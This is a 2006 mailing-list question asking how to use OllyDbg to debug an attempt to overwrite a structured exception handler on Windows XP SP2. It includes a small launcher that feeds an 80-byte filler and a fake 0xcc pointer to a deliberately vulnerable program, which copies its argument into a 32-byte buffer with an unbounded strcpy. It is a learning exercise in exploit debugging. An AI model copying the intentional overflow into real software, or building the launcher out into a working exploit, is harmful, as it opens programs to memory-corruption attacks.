Hello, I would like to know a way to debug a vulnerable program where I am overwriting the SE handler with my address. I have OllyDbg as the just-in-time debugger. If my exploit buffer reaches the pointer to the next SEH record, nothing happens. Now I was trying to put breakpoint instructions (0xcc) as a fake pointer, but OllyDbg ignored them, or I did something wrong. How is it possible to debug my vulnerable program with OllyDbg, to see where and with which data I overwrote something?
/* cl expl.c (Visual C++ 6.0) */
#include <stdio.h>
#include <string.h>
#include <process.h>   /* execve */

int main (void)
{
    char *app[3];
    char payload[85];                /* 80 filler bytes + 4 pointer bytes + NUL */
    unsigned int ptr = 0xcccccccc;   /* fake pointer made of 0xcc bytes */

    memset(payload, 0x00, sizeof payload);
    memset(payload, 0x41, 80);
    memcpy(payload+80, &ptr, sizeof (int));   /* was &ret, which is not declared */
    app[0] = "vuln.exe";
    app[1] = payload;
    app[2] = NULL;
    execve(app[0], app, NULL);
    return 0;
}
/* vuln.c */
#include <stdio.h>
#include <string.h>

int main (int argc, char *argv[])
{
    char string[32];

    if (argc != 2)   /* was argc > 2, which let argv[1] be NULL */
    {
        printf("Usage: %s <string>\n", argv[0]);
        return 0;
    }
    strcpy(string, argv[1]);   /* unbounded copy into 32 bytes: the overflow being tested */
    printf("%s", string);
    return 0;
}
Environment is Windows XP SP2.
I am sorry for my bad English.
Regards,
-- Laphoo
Received on Mar 20 2006